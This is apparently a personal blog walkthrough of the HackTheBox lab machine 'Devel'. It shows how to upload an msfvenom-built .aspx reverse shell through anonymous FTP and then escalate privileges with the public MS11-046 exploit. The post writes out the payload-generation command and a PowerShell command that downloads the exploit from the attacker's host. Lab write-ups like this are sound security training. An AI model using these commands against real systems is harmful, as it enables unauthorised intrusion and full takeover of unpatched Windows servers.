Posts HackTheBox - Devel
Post
Cancel

HackTheBox - Devel

Posted Mar 1, 2021 2021-03-01T14:43:00+00:00 by Connor Weeks-Pearson
Updated Mar 1, 2021 2021-03-01T20:15:22+00:00

Although it’s been a while since my last upload due to getting a new job, i thought it was time to get back on the grind, starting with Devel. This was my second machine rooted without using Metasploit. This machine exploits a Windows web server with anonymous upload privileges via FTP enabled. Once inside, i used “afd.sys” (MS11-046) to esculate priviledges and gain root!

Summary

  • Port scan using NMAP
  • Upload MSFVenom generated .apsx shell to web server via FTP
  • Elevate privilidges using ‘afd.sys’ to gain root

Machine IP: 10.10.10.5

Reconnaissance

NMAP

nmap -n -p- -sV -T 5 10.10.10.5

nmap

FTP is open and so is port 80. Further enumeration:

nmap -p 80,21 -sC -sV -O 10.10.10.5

nmap2

FTP anonymous login is allowed! Maybe we can exploit this? It also containts an aspnet_client. What is it?

FTP

Anonymous FTP is enabled. We also have the ability to upload files using PUT.

ftp1

These are the files located within the FTP directory.

ftp2

HTTP

http1

It seems the website is hosted in the same root directory as FTP. As the file “iisstart.htm” is reachable. Maybe we could upload something via FTP and access it via HTTP?

Creating a simple test.html file and upload it via FTP

http2

Then The on the browser navigate to 10.10.10.5/test.html

http3

It works, confirming that files uploaded by FTP and navigated to are executed by the webserver. The webserver is Microsoft IIS 7.5

Maybe we can upload a reverse shell via FTP and get the web server to execute it?

IIS 7.5

After some googling to find out more about IIS 7.5, i stumbled across this website.

https://stackify.com/iis-web-server/

It highlights that the webserver can do much more than host “ASP.NET apps”.

Okay, but what are ASP.NET apps? After some more googling it seems they use the extension .aspx

As per https://fileinfo.com/extension/aspx

An ASPX file is an Active Server Page Extended (ASPX) file, which is a webpage generated by web servers running the Microsoft ASP.NET framework.

Well our webserver is running the ASP.NET framework, and so we could create a payload with the extension .aspx and get the webserver to execute it!

Exploitation

So now we know that our web server executes .aspx files, we can create a payload using msfvenom with the .aspx extention, and upload it to the root directory.

So first of all, lets check .aspx is a valid format for msfvenom.

msfvenom --list format | grep aspx

aspx1

Both the aspx and aspx-exe extensions are available, great!

Now lets find a windows reverse shell. We will not use meterpreter as it is not available on the OSCP.

msfvenom --list payloads | grep windows/shell

windows/shell_reverse_tcp                  Connect back to attacker and spawn a command shell

Perfect!

Now lets create a .aspx payload called rshell.aspx

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.15 LPORT=4444 -o rshell.aspx

and then upload it using FTP.

put rshell.aspx

Start a netcat listener on port 4444, or any port you like, and get the web server to execute the file.

shell

Navigating to Users, we can see we have 2 accounts:

  • Admin
  • babis

However, we do not have access to either.

shell3

Time for some priviledge esculation.

Priviledge Esculation

System information

Lets start by finding out some information about our target machine:

sysinfo

It looks as though Windows 7 Enterprise version 6.1.7600 is running, and it has not been patched! Lets have a look for some exploits on google.

https://www.exploit-db.com/exploits/40564

This looks like exactly what we need. Lets have a look at the exploit notes:

exploit

It seems the exploit will be compiled within our host machine, and then uploaded to the target machine before execution.

Compiling

First, lets get the file onto our host machine. As the website shows the file is EDB verified, we should be able to find it in searchsploit.

searchsploit -m 40564

Rename the file to MS11-046.c using mv, and then run the command given within the exploit. The compiling will fail, due to our host system not having mingw installed. We can install this using:

sudo apt-get install mingw-w64

Re-run the command, and it will compile.

compiled

Great, we now have an executable! Now to get it on the target machine.

Esculating

The target machine does not have netcat installed, however it does have Windows powershell, so we will use that to connect back to our host machine and download the file.

Start with a Simple python server:

python -m SimpleHTTPServer 6666

and then on the remote machine, use powershell to connect back to the host, and download the file.

This website gives a good insight into how to do this using (new-object System.Net.WebClient).DownloadFile

https://blog.ropnop.com/transferring-files-from-kali-to-windows/#http

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.15:6666/MS11-046.exe' , ‘c:\Users\Public\Downloads\MS11-046.exe’)"

Navigate to /Users/Public/Downloads

transferred

We can see the file is there! Execute it!

root

We have root!!

Flags

Here are the flags for this machine!

User: user

Root: Root

HackTheBox, Easy
devel
This post is licensed under CC BY 4.0 by the author.

Recent Update

Contents

HackTheBox - Blue

HackTheBox - ScriptKiddie

© 2022 ConnorDWP. Some rights reserved.

Powered by LOTS of Coffee!